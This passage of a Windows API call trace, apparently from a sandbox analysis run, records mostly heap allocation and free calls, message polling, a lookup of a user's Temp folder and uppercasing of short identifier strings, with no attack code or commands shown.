0x24b1c48 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0249.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0249.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0249.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0249.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0249.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0249.970] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0249.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0249.970] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0249.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0249.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0249.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0249.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0249.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0249.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0249.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0249.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0249.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0249.971] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0249.971] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0249.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0249.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0249.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0249.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0249.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0249.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0249.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.972] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0249.972] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0249.972] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0249.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0249.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0249.973] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0249.973] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0249.973] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0249.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0249.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0249.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0249.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0249.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0249.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0249.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0249.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0249.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0249.974] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0249.974] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Temp", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x89f2df0, ftLastAccessTime.dwHighDateTime=0x1d509d7, ftLastWriteTime.dwLowDateTime=0x89f2df0, ftLastWriteTime.dwHighDateTime=0x1d509d7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x101052f, dwReserved1=0xa75f, cFileName="Temp", cAlternateFileName="")) returned 0xaa5920 [0249.974] FindClose (in: hFindFile=0xaa5920 | out: hFindFile=0xaa5920) returned 1 [0249.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0249.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0249.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0249.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0249.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0249.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0249.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.977] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0249.977] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0249.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0249.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0249.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0249.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0249.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0249.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0249.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0249.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0249.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0249.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0249.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.979] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0249.979] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0249.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0249.979] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0249.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0249.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0249.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.980] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0249.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0249.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0249.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0249.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0249.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0249.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0249.980] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0249.980] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0249.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0249.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0249.980] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0249.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0249.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa90 [0249.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0249.980] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0249.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0249.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0249.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0249.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0249.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0249.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0249.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0249.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0249.981] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0249.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0249.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0249.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0249.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0249.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0249.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0249.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0249.981] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0249.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0249.981] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0249.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0249.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0249.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0249.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0249.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0249.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0249.982] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0249.982] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 